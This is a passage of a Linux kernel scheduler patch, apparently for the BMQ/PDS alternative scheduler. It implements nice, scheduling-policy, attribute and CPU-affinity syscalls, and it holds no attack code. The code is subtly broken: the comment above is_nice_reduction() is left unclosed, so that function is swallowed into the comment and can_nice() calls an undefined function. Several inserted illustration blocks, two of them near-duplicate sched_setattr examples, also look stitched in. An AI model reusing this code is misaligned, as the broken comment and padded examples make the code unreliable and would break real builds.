++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task becomes
++	 * SCHED_NORMAL/SCHED_BATCH again:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * @p: task
++ * @nice: nice value
++ *
++ * Similar to can_nice() but does not perform a capability check.
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
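++
++/*
++ * For illustration, nice_to_rlimit() maps the nice range [19, -20] onto the
++ * RLIMIT_NICE style range [1, 40], where higher means more privilege. A
++ * minimal sketch of the conversion and the check above:
++ */
++#if 0	/* compile stand-alone: cc nice_rlimit.c && ./a.out */
++#include <assert.h>
++
++static long nice_to_rlimit_demo(long nice)
++{
++	return 20 - nice;	/* 19 -> 1, 0 -> 20, -20 -> 40 */
++}
++
++int main(void)
++{
++	long rlim_cur = 20;	/* e.g. "ulimit -e 20" */
++
++	/* is_nice_reduction(): allowed iff nice_to_rlimit(nice) <= rlimit */
++	assert(nice_to_rlimit_demo(0) <= rlim_cur);	/* nice 0: ok */
++	assert(!(nice_to_rlimit_demo(-5) <= rlim_cur));	/* nice -5: needs CAP_SYS_NICE */
++	return 0;
++}
++#endif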
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy               return value    kernel prio    user prio/nice
++ *
++ * (BMQ) normal, batch, idle  [0 ... 53]      [100 ... 139]  0/[-20 ... 19]/[-7 ... 7]
++ * (PDS) normal, batch, idle  [0 ... 39]      100            0/[-20 ... 19]
++ * fifo, rr                   [-1 ... -100]   [99 ... 0]     [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * Return: the task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * allow the normal nice value to be set, but it will not have any
++	 * effect on scheduling until the task becomes SCHED_NORMAL/
++	 * SCHED_BATCH
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * Check whether the target process has a UID that matches the current process's.
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into prio 0 SCHED_FIFO
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    attr->sched_priority > MAX_RT_PRIO - 1)
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * If task_access_lock() is used here:
++	 * for a task p which is not running, reading rq->stop is
++	 * racy but acceptable, as ->stop doesn't change much.
++	 * An enhancement can be made to read rq->stop safely.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop thread is a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboosts
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may be already dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
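++
++/*
++ * For illustration (sketch only; thread_fn and arg are assumed to exist):
++ * typical in-kernel usage is to spawn a worker and then pick one of the
++ * three canned policies above rather than hand-rolling a priority:
++ *
++ *	struct task_struct *t = kthread_run(thread_fn, arg, "demo-worker");
++ *
++ *	if (!IS_ERR(t))
++ *		sched_set_fifo(t);	// or sched_set_fifo_low() / sched_set_normal(t, -5)
++ */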
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
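++
++/*
++ * For illustration, glibc has no wrapper for these syscalls, so user space
++ * calls them via syscall(2) with a hand-rolled struct whose leading ->size
++ * field drives the ABI handling seen in sched_copy_attr() above. A minimal
++ * sketch setting SCHED_NORMAL / nice 5 (the struct layout mirrors
++ * SCHED_ATTR_SIZE_VER0):
++ */
++#if 0	/* compile stand-alone: cc setattr_demo.c && ./a.out */
++#include <stdint.h>
++#include <stdio.h>
++#include <sys/syscall.h>
++#include <unistd.h>
++
++struct sched_attr_v0 {
++	uint32_t size;
++	uint32_t sched_policy;
++	uint64_t sched_flags;
++	int32_t  sched_nice;		/* SCHED_NORMAL/SCHED_BATCH */
++	uint32_t sched_priority;	/* SCHED_FIFO/SCHED_RR */
++	uint64_t sched_runtime, sched_deadline, sched_period;
++};
++
++int main(void)
++{
++	struct sched_attr_v0 attr = {
++		.size		= sizeof(attr),
++		.sched_policy	= 0,	/* SCHED_NORMAL */
++		.sched_nice	= 5,
++	};
++
++	/* pid 0 == current task; flags must be 0 */
++	if (syscall(SYS_sched_setattr, 0, &attr, 0))
++		perror("sched_setattr");
++	return 0;
++}
++#endif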
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
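++
++/*
++ * Illustrative only, not part of the patched kernel: a minimal
++ * user-space sketch of the raw syscall, assuming the UAPI sched_attr
++ * from <linux/sched/types.h>. The attr.size field is what the
++ * sched_copy_attr() ABI handling above keys off:
++ *
++ *	struct sched_attr attr = {
++ *		.size         = sizeof(attr),	// ABI versioning field
++ *		.sched_policy = SCHED_NORMAL,
++ *		.sched_nice   = 5,		// clamped to [-20, 19] above
++ *	};
++ *	// pid 0 means the calling thread; flags must be 0 for now.
++ *	if (syscall(SYS_sched_setattr, 0, &attr, 0))
++ *		perror("sched_setattr");
++ */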
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getparam - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * parts of which the kernel doesn't know about. Just ignore them - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
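++
++/*
++ * Illustrative only, not part of the patched kernel: reading the
++ * attributes back. Passing sizeof(attr) as usize exercises the
++ * forward/backward compatibility cases documented in
++ * sched_attr_copy_to_user(); an older binary with a smaller struct
++ * still gets a consistent, truncated copy.
++ *
++ *	struct sched_attr attr;
++ *	if (syscall(SYS_sched_getattr, 0, &attr, sizeof(attr), 0) == 0)
++ *		printf("policy=%u nice=%d\n",
++ *		       attr.sched_policy, attr.sched_nice);
++ */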
++
++#ifdef CONFIG_SMP
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
